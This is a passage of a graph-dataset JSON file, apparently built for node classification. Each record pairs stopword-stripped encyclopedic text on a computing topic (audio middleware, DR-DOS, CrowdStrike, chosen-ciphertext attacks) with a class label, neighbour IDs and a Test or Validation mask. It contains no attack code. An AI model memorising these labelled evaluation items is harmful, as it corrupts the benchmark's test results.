      11175,
      6954,
      5677,
      9518,
      688,
      5682,
      2739,
      823,
      5178,
      700,
      2109,
      3006,
      704,
      1474,
      2887,
      584,
      5191,
      9424,
      4562,
      8787,
      9432,
      4957,
      5470,
      9569,
      2275,
      10341,
      4198,
      11112,
      2154,
      7022,
      9455,
      2931,
      9460,
      4475,
      5373,
      9214
    ],
    "mask": "Validation"
  },
  {
    "node_id": 162,
    "label": 7,
    "text": "Audiokinetic_Wwise:audiokinetic wwise wwise wave works interactive sound engine audiokinetic software solution interactive media video games available free non-commercial users license commercial video game developers features audio authoring tool cross-platform sound engine sony interactive entertainment announced acquisition company january 8 2019 wwise authoring application uses graphical interface centralize aspects audio creation functionality interface allows sound designers wwise allows on-the-fly audio authoring directly game local network users create audition tweak sound effects subtle sound behaviors game played another host wwise also includes following components wwise supports following platforms recent titles used audiokinetic include wwise intended compatible proprietary commercial engines audiokinetic partners audio developers bring audio technology gaming industry partnership add-ons wwise include one play used wwise interactive music capabilities live performance",
    "neighbors": [
      2368,
      2338,
      8937,
      6797,
      11602,
      823,
      8185,
      10076
    ],
    "mask": "None"
  },
  {
    "node_id": 163,
    "label": 1,
    "text": "International_Road_Traffic_and_Accident_Database:international road traffic accident database international road traffic accident database irtad data collection maintained organisation economic co-operation development oecd international transport forum itf paris covering safety data countries within outside europe database started 1988 federal institution roads bast bergisch gladbach germany response demands international comparative data grown important resource comparing road safety metrics various developed countries present 37 countries included argentina australia austria belgium cambodia canada chile colombia czech republic denmark finland france germany greece hungary iceland ireland israel italy japan korea south korea lithuania luxembourg malaysia netherlands new zealand nigeria norway poland portugal serbia slovenia spain sweden switzerland united kingdom united states following statistics available general use",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 164,
    "label": 7,
    "text": "Netskope:netskope netskope inc. american software company founded 2012 helps companies protect data protect threats cloud applications cloud infrastructure web netskope category technology classified gartner cloud access security brokers netskope recognised leader gartner magic quadrant cloud access security brokers netskope based santa clara california software development office bangalore india netskope founded sanjay beri lebin cheng ravi ithal krishna narayanaswamy 21.4 million funding several company early employees distinguished engineers principal architects companies palo alto networks juniper networks/netscreen mcafee/intruvert founder sanjay beri became company ceo 2012 october 2013 company launched made software generally available month announced formation advisory team appointed enrique salem former symantec chairman ceo board directors may 15 2014 netskope announced series c funding 35 million led accel partners added eric wolford partner accel board directors jun 6 2017 netskope raised series e funding 100 million resulting total funding 231 million joining silicon valley unicorn club july 19 2016 netskope based work krishna narayanswamy lebin cheng ravi ithal sanjay beri received united states patent 9,398,102 security network delivered service november 2018 company announced raised 169 million new venture funds private valuation 1 billion company raised 400 million six rounds funding netskope software delivered saas via distributed cloud soc-2 data centers solution steers cloud web traffic cloud-native service purposes inspection policy enforcement clients netskope log software via web browser interface access analytics cloud cloud usage set policies control secure specific usage behavior alert administrator netskope offers different deployment options traffic steering analysis policy control include log ingestion api connectors agent-less forward proxy reverse proxy thin agent profile remote users pcs mobile devices gre ipsec tunneling netskope enforce policies including data loss prevention dlp anti-malware encryption access control incident management services cloud web traffic inspects",
    "neighbors": [
      704,
      11577,
      8591
    ],
    "mask": "Test"
  },
  {
    "node_id": 165,
    "label": 4,
    "text": "Ipsectrace:ipsectrace ipsectrace software tool designed wayne schroeder help profile ipsec connections packet capture pcp file program uses command line interface point pcp capture informs user going somewhat inspired tcptrace uses input pcp files ipsectrace available linux operating system coded c++ licensed gpl effectively allowing anyone modify redistribute although main purpose monitor ipsec traffic ipsectrace used crack extra layers security brought vpn implementations security ipsec ssh whereas programs anger deceit ettercap used infiltrate pptp security",
    "neighbors": [
      10341,
      9640,
      7983,
      5492,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 166,
    "label": 2,
    "text": "Apple_Symbols:apple symbols apple symbols font introduced mac os x 10.3 panther truetype font intended provide coverage characters defined symbols unicode standard continues ship mac os x part default installation prior mac os x 10.5 path codice_1 mac os x 10.5 onward found codice_2 meaning considered essential part system software deleted users version font mac os x 10.5 6.0d7e4 mac os x version font contains 5000 glyphs following unicode blocks apple lists font copyright 2003 version 5.0d5e1 apple symbols significantly extended mac os x v10.5 leopard release version 6.0d7e4 2007-08-03 tripled glyph repertoire well additions unicode blocks partially covered earlier releases font included new glyphs latin greek shavian following unicode blocks",
    "neighbors": [
      10432,
      7171,
      5713,
      9912,
      8701
    ],
    "mask": "Test"
  },
  {
    "node_id": 167,
    "label": 2,
    "text": "Nokia_N92:nokia n92 nokia n92 smartphone part multimedia nseries announced november 2 2005 world first mobile phone integrated dvb-h tuner excluding experimental 7710 result nokia marketed phone watching tv go featured swivel design n90 runs symbian os v9.1 s60 3rd edition interface interesting features handset dvb-h receiver include program guide recording facility phone constant 30 second rolling record function instant replay record broadcasts memory card providers may charge features elsewhere n92 also advanced featuring large 2.8 display largest time excluding communicators dedicated multimedia keys 3g wi-fi upnp 2 megapixel camera flash cpu runs clock speed 268 mhz however considerably heavy 191 g despite size upon release q2 2006 retailed 600 euros n92 one rarest devices nokia go high prices second hand market keypad unusual numbers viewable portrait landscape modes accommodate screen opened two different positions unusual keypad users refer confusing",
    "neighbors": [
      1537,
      4609,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      8433,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 168,
    "label": 2,
    "text": "Apple_Open_Directory:apple open directory apple open directory ldap directory service model implementation apple inc. directory service software stores organizes information computer network users network resources allows network administrators manage users access resources context macos server open directory describes shared ldapv3 directory domain corresponding authentication model composed apple password server kerberos 5 tied together using modular directory services system apple open directory fork openldap term open directory also used describe entire directory services framework used macos macos server context describes role macos macos server system connected existing directory domain context sometimes referred directory services apple inc. also publishes api called opendirectory framework permitting macos applications interrogate edit open directory data release mac os x leopard 10.5 apple chose move away using netinfo directory service originally found nextstep openstep used default local accounts groups every release mac os x 10.0 10.4 mac os x 10.5 uses directory services plugins directory information local accounts registered local plugin uses xml property list plist files stored /var/db/dslocal/nodes/default/ backing storage macos server host open directory domain configured open directory master addition local directory openldap-based ldapv3 domain designed store centralized management data user group computer accounts systems access directory domain paired open directory password server optionally kerberos realm either provides authentication model stores password information outside directory domain kerberos authentication kerberos realm either hosted kerberos key distribution center kdc running server system server participate existing kerberos realm services kerberized password server provides following simple authentication security layer-based authentication methods mac os x server system prior 10.7 lion configured active directory master act windows primary domain controller pdc providing domain authentication services microsoft windows clients general sense open directory describe plugins model used directory utility directory services framework macos macos server could thought analogous name service switch systems unix-like operating systems connected directory system macos client server authenticate users lookup contacts perform service discovery name resolution following types directories open directory began mac os x server 10.2 initial form open directory consisted network-visible netinfo directory domain corresponding authentication manager service storing passwords outside directory version 10.2 also included support kerberos mac os x versions 10.1 10.0 stored user password information within directory domain using crypt password authentication authorities version 10.2 paved way current shadow hash password server mechanisms password server successor authentication manager introduced open directory 2 mac os x server 10.3 open directory 2 also first version use ldapv3 directory domain mac os x server 10.4 includes open directory 3 introduced active directory domain member support trusted directory binding increased robustness mac os x server 10.5 features open directory 4 support cross-domain authorization built-in radius server managing airport base stations open directory 4 longer includes elements netinfo",
    "neighbors": [
      514,
      9734,
      7307,
      6797,
      5397,
      7318,
      929,
      3371,
      7983,
      8760,
      6855,
      10058,
      6098,
      7378,
      8404,
      4184,
      865,
      2274,
      866,
      5093,
      11246,
      8441,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 169,
    "label": 4,
    "text": "Differential_equations_of_addition:differential equations addition cryptography differential equations addition dea one basic equations related differential cryptanalysis mix additions two different groups e.g addition modulo 2 addition gf 2 input output differences expressed xors differential equations addition dea following form formula_1 formula_2 formula_3 formula_4-bit unknown variables formula_5 formula_6 formula_7 known variables symbols formula_8 formula_9 denote addition modulo formula_10 bitwise exclusive-or respectively equation denoted formula_11 let set formula_12 integer less formula_13 denote system formula_14 dea formula_14 polynomial formula_4 proved satisfiability arbitrary set dea complexity class p brute force search requires exponential time 2013 properties special form dea reported chengqing li et al. formula_17 formula_3 assumed known essentially special dea represented formula_19 based found properties algorithm deriving formula_2 proposed analyzed solution arbitrary set dea either batch adaptive query model due souradyuti paul bart preneel solution techniques used attack stream cipher helix",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      11185,
      8627,
      10806,
      1847,
      9528,
      2110,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034
    ],
    "mask": "Test"
  },
  {
    "node_id": 170,
    "label": 7,
    "text": "Cloud_testing:cloud testing cloud testing form software testing web applications use cloud computing environments cloud simulate real-world user traffic cloud testing uses cloud infrastructure software testing organizations pursuing testing general load performance testing production service monitoring particular challenged several problems like limited test budget meeting deadlines high costs per test large number test cases little reuse tests geographical distribution users add challenges moreover ensuring high quality service delivery avoiding outages requires testing one datacenter outside data-center cloud testing solution problems effective unlimited storage quick availability infrastructure scalability flexibility availability distributed testing environment reduce execution time testing large applications lead cost-effective solutions traditional approaches test software incurs high cost simulate user activity different geographic locations testing firewalls load balancers involves expenditure hardware software maintenance case applications rate increase number users unpredictable variation deployment environment depending client requirements cloud testing effective stress test used determine ability application maintain certain level effectiveness beyond breaking point essential application work even excessive stress maintain stability stress testing assures creating peak loads using simulators cost creating scenarios enormous instead investing capital building on-premises testing environments cloud testing offers affordable scalable alternative load testing application involves creation heavy user traffic measuring response also need tune performance application meet certain standards however number tools available purpose finding thresholds bottlenecks limitations part performance testing testing performance particular workload necessary using cloud testing easy create environment vary nature traffic on-demand effectively reduces cost time simulating thousands geographically targeted users functional testing internet non-internet applications performed using cloud testing process verification specifications system requirements carried cloud instead on-site software testing using cloud environment instances different operating systems created demand making compatibility testing effortless verify application support various browser types performance type accomplished ease various tools enable automated website testing cloud cloud testing utilized measure latency action corresponding response application deploying cloud companies simulate real world web users using cloud testing services provided cloud service vendors advaltis compuware hp keynote systems neotys radview soasta user scenarios developed test designed service providers leverage cloud servers provided cloud platform vendors amazon.com google rackspace microsoft etc generate web traffic originates around world test complete cloud service providers deliver results analytics back corporate professionals real-time dashboards complete analysis applications internet perform peak volumes cloud testing often seen performance load tests however discussed earlier covers many types testing cloud computing often referred marriage software service saas utility computing regard test execution software offered service may transaction generator cloud provider infrastructure software may latter distributed systems parallel systems mainly use approach testing inherent complex nature d-cloud example software testing environment testing non-internet applications virtual instances testing environment quickly set automated testing application cloud testing service providers provide essential testing environment per requirement application test actual testing applications performed testing team organization owns application third party testing vendors leading cloud computing service providers include among others amazon advaltis 3-terra microsoft skytap hp soasta ability cost simulate web traffic software testing purposes inhibitor overall web reliability low cost accessibility cloud extremely large computing resources provides ability replicate real world usage systems geographically distributed users executing wide varieties user scenarios scales previously unattainable traditional testing environments minimal start-up time along quality assurance achieved cloud testing following key benefits initial setup cost migrating testing cloud high involves modifying test cases suit cloud environment makes decision migration crucial therefore cloud testing necessarily best solution testing problems legacy systems services need modified order tested cloud usage robust interfaces legacy systems may solve problem also like cloud services cloud testing vulnerable security issues test results may accurate due varying performance service providers ’ network internet many cases service virtualization applied simulate specific performance behaviors required accurate thorough testing",
    "neighbors": [
      4194,
      8998,
      3688,
      5384,
      6856,
      3819,
      7790,
      467,
      8566,
      9754
    ],
    "mask": "None"
  },
  {
    "node_id": 171,
    "label": 4,
    "text": "IOS_app_approvals:ios app approvals submissions mobile apps ios subject approval apple app review team outlined sdk agreement basic reliability testing analysis published app store applications may still distributed ad hoc rejected author manually submitting request apple license application individual iphones although apple may withdraw ability authors later date non-disclosure agreements always forbidden developers publishing content rejection notices apple started labeling rejection letters explicit non-disclosure warning apple later changed nda citing created much burden developers reverse decision forbid publication rejection notices applications available outside region specific app stores request developer addition apple removed software licensed gnu general public license gpl app store complaints one program developers vlc media player claiming app store terms service inconsistent gpl applicants denied apps fundamentally duplicating apple apps example providing email interface added functionality use elements built sms app applications also rejected duplicating functionality itunes applications may rejected limited utility reports indicate toolbars must placed bottom screen vibration function used alerts launched july 2008 app store averaged 1 million application sales day first month existence get applications app store developers required submit app wait approval rejection apple rejected apps given feedback reason rejected could modified resubmitted approval process apple changed time terms feedback developers time delay apps approved july 2009 application could take weeks apple streamlined process end 2009 apps processed days addition december 2009 app store began providing detailed feedback developers approval process rather simply showing waiting approval approved rejected time requirements evolved trends appeared application development example applications accessing user location advertising valid prior fall 2009 point apps rejected provide robust user experience beyond simply using location data advertising requirements using undocumented apis always led rejection 2010 ipad app approval process could lengthy similar weeks experienced previously iphone applications june 2010 steve jobs wwdc 2010 said 95 apps processed within 7 business days according apple developer portal 3 july 2014 98 new updated apps processed within 5 business days september 9 2010 apple published official app store review guidelines developers time several development restrictions lifted many developers previously rejected applications asked resubmit applications new guidelines app review guideline document living document apple change time essentially guidelines put place prevent problems pornography violence legal issues user experience specific guidelines apps apple checks app guidelines approving sale inclusion app store apps get featured get promoted apple within app store typically within specific app category specific guidelines getting app featured notable cases app developers gather feedback directly apple releasing app indicated improves chances getting featured may 2009 apple rejected first version 'newspapers iphone app let users read content 50+ newspapers around world including new york times france le monde united kingdom tabloid sun app rejected topless page 3 girls daily features described obscene second version application submitted removing access sun adding price tag £0.59 app made available summer release iphone os 3.0 software another application similar nature 'newspapers called 'eucalyptus allowed users download e-books iphone though rejected apple one e-books could downloaded kama sutra ban since lifted app store playboy sports illustrated adult-rated apps yet removed apps others removed citing adult content resulted accusations hypocrisy despite adult sites continue market iphone ipad users november 2009 application stern mainstream german weekly magazine print circulation 900,000 deleted several weeks without warning january 2010 europe largest newspaper german tabloid bild removed content iphone version print edition request apple later modify one applications like stern case nudity association german magazine publishers vdz warned interventions apple might moving towards censorship guardian described rejection explicit content apple analogous distributor wh smith main distributor many years imposed content restrictions british publishers workers fashion magazine dazed confused nicknamed ipad edition iran edition december 2009 apple banned cartoon app called newstoons cartoonist mark fiore grounds ridiculed public figures april 2010 fiore pulitzer prize political satire cartoons making history first internet-only cartoonist win prestigious journalistic prize following public outcry story broke wake award apple asked fiore resubmit app subsequently accepted fiore said sure mine might get approved someone ’ pulitzer maybe making better political app mine need media frenzy get app approved political material april 2009 game called baby shaker approved app store later removed due complaints game allowed user shake phone order quiet crying cartoon baby onscreen app criticized making light shaken baby syndrome condition shaking baby results severe brain injury may 2009 trent reznor nine inch nails announced via twitter account apple rejected update nine inch nails application due objectionable content developer posted message nine inch nails discussion boards explaining situation v1.0 live v1.0.3 got rejected due content yet app content mainly stability release fix bug crashes app international users bug fixed 24 hours 1.0 went live waiting apple approve ever since meanwhile app continues get growing number 1 star ratings international users understandably frustrated bug looks like hands tied apple later permitted update december 2009 ted lando ebook app take control iphone os 3 rejected apple app permitted back app store references jailbreaking removed august 2012 josh begley created drone strike iphone app sent push notification whenever us military drone aircraft struck target app rejected apple finding content objectionable crude march 2016 apple rejected update app addreminder apple watch keyboard despite excellent reviews unanimous user feedback keyboard easy use developer wrote open letter apple ios app store applications must support sandboxing list permissions required correct functionality review process application manually tested static analysis run binary code 2013 test malware application using dynamic code reassembly techniques named jekyll reference stevenson novella approved released app store apple claimed unspecified changes made ios response attack september 2015 infected programs published public download app store malicious code embedded chinese legitimate software modified version xcode see xcodeghost bigger applications code angry birds 2 camcard tinydeal.com among others apple confirmed attack stated working developers make sure using proper version xcode rebuild apps october 2015 apple also confirmed removed applications app store due privacy concerns commented applications could used compromise ssl/tls security solutions",
    "neighbors": [
      10755,
      9732,
      1549,
      7697,
      11289,
      6186,
      6700,
      1074,
      9784,
      8253,
      576,
      8783,
      4180,
      10838,
      9826,
      5733,
      8806,
      3691,
      2676,
      6264,
      7806,
      2686,
      6783,
      10878,
      8842,
      5784,
      1177,
      4251,
      2207,
      11430,
      2735,
      3248,
      4283,
      7869,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      231,
      2282,
      1772,
      4844,
      10478,
      8441,
      2819,
      1290,
      9999,
      784,
      1299,
      4888,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      2388,
      7515,
      6495,
      9063,
      10602,
      3948,
      4972,
      11629,
      10608,
      7541,
      6023,
      6539,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 172,
    "label": 5,
    "text": "TRILL_(computing):trill computing trill transparent interconnection lots links ietf standard implemented devices called rbridges routing bridges trill switches trill combines techniques bridging routing application link state routing vlan-aware customer-bridging problem rbridges compatible incrementally replace previous ieee 802.1 customer bridges also compatible ipv4 ipv6 routers end nodes invisible current ip routers like routers rbridges terminate bridge spanning tree protocol trill switches rbridges run link state protocol amongst link state protocol one connectivity broadcast rbridges rbridge knows rbridges connectivity gives rbridges enough information compute pair-wise optimal paths unicast calculate distribution trees delivery frames either destinations whose location unknown multicast broadcast groups link state routing protocol used is-is mitigate temporary loop issues rbridges forward based header hop count rbridges also specify next hop rbridge frame destination forwarding unicast frames across shared-media link avoids spawning additional copies frames temporary loop reverse path forwarding check checks performed multi-destination frames control potentially looping traffic first rbridge unicast frame encounters campus rb1 encapsulates received frame trill header specifies last rbridge rb2 frame decapsulated rb1 known ingress rbridge rb2 known egress rbridge save room trill header simplify forwarding lookups dynamic nickname acquisition protocol run among rbridges select two-octet nicknames rbridges unique within campus abbreviation six-octet is-is system id rbridge two-octet nicknames used specify ingress egress rbridges trill header trill header consists six octets first two octets include six bit decrementing hop count plus flags next two octets contain egress rbridge nickname final two octets contain ingress rbridge nickname multi-destination frames egress rbridge nickname specifies distribution tree frame nick named rbridge root distribution tree ingress rbridge selects distribution tree frame travel along even though rbridges transparent layer 3 devices links interconnected rbridges appear layer 3 devices single link rbridges act link routers sense forwarding frame transit rbridge outer layer 2 header replaced hop appropriate layer 2 header next hop hop count decreased despite modifications outer layer 2 header hop count trill header original encapsulated frame preserved including original frame vlan tag multipathing multi-destination frames alternative distribution tree roots ecmp equal cost multipath unicast frames supported networks mesh-like structure benefit greater extent multipathing optimal paths provided trill networks tree-like structure point view trill link wide variety link technologies including ieee 802.3 ethernet ppp point point protocol pseudo-wire ethernet links rbridges incorporate ieee customer provider 802.1 bridges words arbitrary bridged lan appears rbridge multi-access link essential one rbridge act ingress rbridge given native frame trill appointed forwarder mechanism assure trill allow load splitting duty link based vlan one rbridge link encapsulates decapsulates native frames vlan rbridge ports compatibly implement wide variety existing proposed link level ieee 802.1 port level protocols including pause ieee 802.3 annex 31b link layer discovery protocol ieee 802.1ab link aggregation ieee 802.1ax mac security ieee 802.1ae port based access control ieee 802.1x rbridges layered ieee 802.1 eiss extended internal sublayer service exception rbridge port handles spanning tree vlan registration pdus differently cisco fabricpath proprietary implementation trill utilizes trill control plane including is-is layer 2 non-interoperable data plane brocade virtual cluster switching uses trill data plane proprietary control plane interoperable standards conformant trill trill protocol provides mandatory support usual 4k vlans optionally support 24-bit fine grain labels fgl addition vlans rfc 7172 trill fine grained labeling ieee 802.1aq standard shortest path bridging – spb considered major competitor trill one 2011 book noted evaluation relative merits difference two standards proposals currently hotly debated topic networking industry",
    "neighbors": [
      10242,
      3847,
      5384,
      649,
      7049,
      9868,
      3218,
      9365,
      5270,
      10005,
      11413,
      5402,
      5531,
      3742,
      2206,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      11321,
      10171,
      4797,
      3006,
      3133,
      5181,
      5437,
      10303,
      7364,
      2887,
      8265,
      11210,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      2912,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6904,
      6651,
      8828
    ],
    "mask": "Test"
  },
  {
    "node_id": 173,
    "label": 4,
    "text": "Leo_Rosen:leo rosen leo rosen u.s. cryptanalyst worked frank rowlett signals intelligence service s.i.s start world war ii japanese ciphers rowlett found method read messages enciphered japanese purple machine rosen deduced correctly mechanism cipher machine even though mechanism used purple telephone stepping switches substantially different machines wired rotor pinwheel machines rosen built replica purple turned machine found years later use stepping switches similar common use time u.s machine used decode japanese diplomatic messages sometimes japanese ambassadors rosen also contributed engineering talents war arlington hall s.i.s became army security agency later become afsa finally present national security agency 2010 posthumestly inducted nsa hall honor contributions cryptology world represented son lawrence rosen grandchildren philip rosen michael rosen christine rosen",
    "neighbors": [
      4007,
      6572,
      7887,
      1941,
      5310
    ],
    "mask": "Test"
  },
  {
    "node_id": 174,
    "label": 4,
    "text": "Privilege_revocation_(computing):privilege revocation computing privilege revocation act entity giving privileges possess authority taking privileged rights away honoring principle least privilege granularity provided base system sandboxing point successful attacks unprivileged user account helps reliability computing services provided system chances restarting process better services machine n't affected least probably much alternative case i.e privileged process gone haywire instead computing security privilege revocation measure taken program protect system misuse privilege revocation variant privilege separation whereby program terminates privileged part immediately served purpose program n't revoke privileges risks escalation privileges revocation privileges technique defensive programming",
    "neighbors": [
      4071,
      8679,
      4972,
      10835,
      7030,
      8344,
      7804,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 175,
    "label": 4,
    "text": "Stealware:stealware stealware refers type malware covertly transfers money data third party specifically stealware uses http cookie redirect commission ordinarily earned site referring users another site",
    "neighbors": [
      10392,
      7515,
      7965
    ],
    "mask": "None"
  },
  {
    "node_id": 176,
    "label": 4,
    "text": "CrowdStrike:crowdstrike crowdstrike inc. american cybersecurity technology company based sunnyvale california company provides endpoint security threat intelligence cyberattack response services company involved investigations several high profile cyber-attacks including sony pictures hack 2016 democratic national committee email leak democratic national committee cyber attacks company wholly owned subsidiary crowdstrike holdings inc according company customers include 44 fortune 100 37 100 top global companies crowdstrike co-founded george kurtz ceo dmitri alperovitch cto gregg marston cfo retired 2011 2012 shawn henry former federal bureau investigation fbi executive led fbi criminal cyber divisions hired lead sister company crowdstrike services inc. focused proactive incident response services june 2013 company launched first product crowdstrike falcon company became known providing threat intelligence attribution nation state actors conducting economic espionage ip theft may 2014 supported crowdstrike reports united states department justice charged five chinese military hackers economic cyber espionage united states corporations crowdstrike also uncovered activities energetic bear adversary group connected russian federation conducted intelligence operations global targets primarily energy sector public sony pictures hack crowdstrike produced evidence implicating government north korea within 48 hours demonstrated attack carried 2014 crowdstrike played major role identifying members putter panda state-sponsored chinese group also known pla unit 61486 perpetrators number cyberattacks u.s. infrastructure defense well european satellite aerospace industries 2014 2015 crn magazine named company top emerging vendors list may 2015 company released researcher jason geffner discovery venom critical flaw open-source hypervisor called quick emulator qemu used number common virtualization products vulnerability could allow attackers access sensitive personal information october 2015 crowdstrike announced identified chinese hackers attacking technology pharmaceutical companies immediately president barack obama chinese president xi jinping publicly agreed use cyber-spies conduct economic espionage alleged hacking would violation agreement 2016 company ranked 40 deloitte technology fast 500 north america list inc. named crowdstrike one america 500 fastest-growing companies crowdstrike released research 2017 showing 66 percent attacks company responded year fileless malware-free company also compiled data average time needed detect attack percentage attacks detected organizations 2017 2018 crowdstrike listed linkedin ’ top companies start ups forbes cloud 100 one cnbc disruptor 50 february 2018 crowdstrike reported november december 2017 observed credential harvesting operation international sporting sector possible links cyber attack opening ceremonies winter olympics pyeongchang month crowdstrike released research showing 39 percent attacks observed company malware-free intrusions company also named industries attackers frequently targeted march company released version falcon product mobile devices launched crowdstrike store opens falcon platform third-party applications january 2019 crowdstrike published research reporting ryuk ransomware used cyber actor grim spider target businesses accumulated 3.7 million cryptocurrency payments since first appeared august also 2019 crowdstrike released 2018 global threat report ranked cybercriminals order fastest actors operate within network russia coming first company also revealed tracked 81 named state-sponsored actors 2018 least 28 conducting active operations throughout year research showed sophisticated attacks company attributed nation-states china responsible plurality 25 percent july 2015 google invested company series c funding round total raised 100 million series may 2017 brought 100 million series e june 2018 brought 200 million total may 2019 company raised 480 million funding june 2018 company said valued 3 billion investors include telstra march capital partners rackspace accel partners warburg pincus 2017 crowdstrike received 256 million funding estimated annual revenue time 100 million valuation 1 billion investors included telstra march capital partners rackspace accel partners warburg pincus june 2019 company made ipo nasdaq crowdstrike helped investigate democratic national committee cyber attacks connected attacks russian intelligence services march 20 2017 testimony congress james comey stated crowdstrike mandiant threatconnect review ed evidence hack conclude high certainty work apt 28 apt 29 known russian intelligence services december 2016 crowdstrike released report stating russian government-affiliated group fancy bear hacked ukrainian artillery app concluded russia used hack cause large losses ukrainian artillery units app called artos installed tablet pcs used fire-control earliest version app supported 2015 called popr-d30 installed android phones tablets crowdstrike found hacked variation popr-d30 distributed ukrainian military forums utilized x-agent implant international institute strategic studies rejected crowdstrike assessment hacking causing losses ukrainian artillery units saying data ukrainian d30 howitzer losses misused crowdstrike report ukrainian ministry defense also rejected crowdstrike report stating actual artillery losses several times smaller number reported crowdstrike associated russian hacking cybersecurity firm secureworks discovered list email addresses targeted fancy bear phishing attacks list included email address yaroslav sherstyuk developer artos additional associated press research supports crowdstrike conclusions fancy bear radio free europe notes ap report lends credence original crowdstrike report showing app fact targeted following crowdstrike investigation 2016 democratic national committee hacks journalist yasha levine questioned crowdstrike methodology citing forensics reverse fortune given crowdstrike three great place work awards inc. praised company remote work program",
    "neighbors": [
      1888,
      8288,
      2213,
      2558,
      10502,
      8489,
      1994,
      2090,
      3819,
      10252,
      10539,
      6031,
      3825,
      4689,
      9688,
      10264,
      5373,
      1886
    ],
    "mask": "Test"
  },
  {
    "node_id": 177,
    "label": 4,
    "text": "Adaptive_chosen-ciphertext_attack:adaptive chosen-ciphertext attack adaptive chosen-ciphertext attack abbreviated cca2 interactive form chosen-ciphertext attack attacker first sends number ciphertexts decrypted chosen adaptively uses results distinguish target ciphertext without consulting oracle challenge ciphertext adaptive attack attacker allowed adaptive queries asked target revealed target query disallowed extensing indifferent non-adaptive chosen-ciphertext attack cca1 second stage adaptive queries allowed charles rackoff dan simon defined cca2 suggested system building non-adaptive cca1 definition system moni naor moti yung first treatment chosen ciphertext attack immunity public key systems certain practical settings goal attack gradually reveal information encrypted message decryption key public-key systems adaptive-chosen-ciphertexts generally applicable property ciphertext malleability — ciphertext modified specific ways predictable effect decryption message adaptive-chosen-ciphertext attacks perhaps considered theoretical concern manifested practice 1998 daniel bleichenbacher bell laboratories time demonstrated practical attack systems using rsa encryption concert pkcs 1 v1 encoding function including version secure socket layer ssl protocol used thousands web servers time bleichenbacher attacks also known million message attack took advantage flaws within pkcs 1 function gradually reveal content rsa encrypted message requires sending several million test ciphertexts decryption device e.g. ssl-equipped web server practical terms means ssl session key exposed reasonable amount time perhaps day less slight variations vulnerability still exists many modern servers new name return bleichenbacher oracle threat robot order prevent adaptive-chosen-ciphertext attacks necessary use encryption encoding scheme limits ciphertext malleability proof security system theoretical foundation level development cca secure systems number systems proposed random oracle model common standard rsa encryption optimal asymmetric encryption padding oaep unlike improvised schemes padding used early versions pkcs 1 oaep proven secure random oracle model oaep incorporated pkcs 1 version 2.0 published 1998 now-recommended encoding scheme older scheme still supported recommended new applications however golden standard security show system secure without relying random oracle idealization complexity-theoretic cryptography security adaptive chosen-ciphertext attacks commonly modeled using ciphertext indistinguishability ind-cca2",
    "neighbors": [
      225,
      8674,
      1797,
      7212,
      11119,
      1688,
      8286,
      3774,
      4639
    ],
    "mask": "Validation"
  },
  {
    "node_id": 178,
    "label": 2,
    "text": "DR-DOS:dr-dos dr-dos dr dos without hyphen including version 6.0 operating system dos family written ibm pc-compatible personal computers originally developed gary a. kildall digital research derived concurrent pc dos 6.0 advanced successor cp/m-86 ownership changed various later versions produced names including novell dos caldera opendos digital research original cp/m 8-bit intel 8080- z-80-based systems spawned numerous spin-off versions notably cp/m-86 intel 8086/8088 family processors although cp/m dominated market shipped vast majority non-proprietary-architecture personal computers ibm pc 1981 brought beginning eventually massive change ibm originally approached digital research seeking x86 version cp/m however disagreements contract ibm withdrew instead deal struck microsoft purchased another operating system 86-dos seattle computer products scp became microsoft ms-dos ibm pc dos 86-dos command structure application programming interface imitated cp/m digital research threatened legal action claiming pc dos/ms-dos similar cp/m ibm settled agreeing sell digital research x86 version cp/m cp/m-86 alongside pc dos however pc dos sold cp/m-86 price tag proportion pc buyers prepared spend six times much buy cp/m-86 small availability compatible application software first decisively digital research favor temporary digital research fought long losing battle promote cp/m-86 multi-tasking multi-user successors mp/m-86 concurrent cp/m-86 eventually decided could beat microsoft-ibm lead application software availability modified concurrent cp/m-86 allow run applications ms-dos pc dos shown publicly december 1983 shipped march 1984 concurrent dos 3.1 a.k.a cdos bdos 3.1 hardware vendors concurrent dos continued evolve various flavours years eventually become multiuser dos real/32 specifically tailored desktop market expensive single-user applications therefore time two attempts made sideline product 1985 digital research developed dos plus 1.0 2.1 stripped-down modified single-user derivative concurrent dos 4.1 5.0 ran applications platforms allowed switching several tasks original cp/m-86 dos compatibility limited digital research made another attempt time native dos system new disk operating system launched 1988 dr dos although dri based pacific grove later monterey california usa work dos plus started newbury berkshire uk digital research europe oem support group located since 1983 since 1986 operating system work concurrent dos 386 xm multiuser dos dr dos palmdos done digital research european development centre edc hungerford berkshire uk later work also done digital research gmbh münchen germany requested several oems digital research started plan develop new dos operating system addressing shortcomings left ms-dos 1987 particular importance million dollar deal kazuhiko kay nishi ascii corporation previously instrumental opening japanese oem 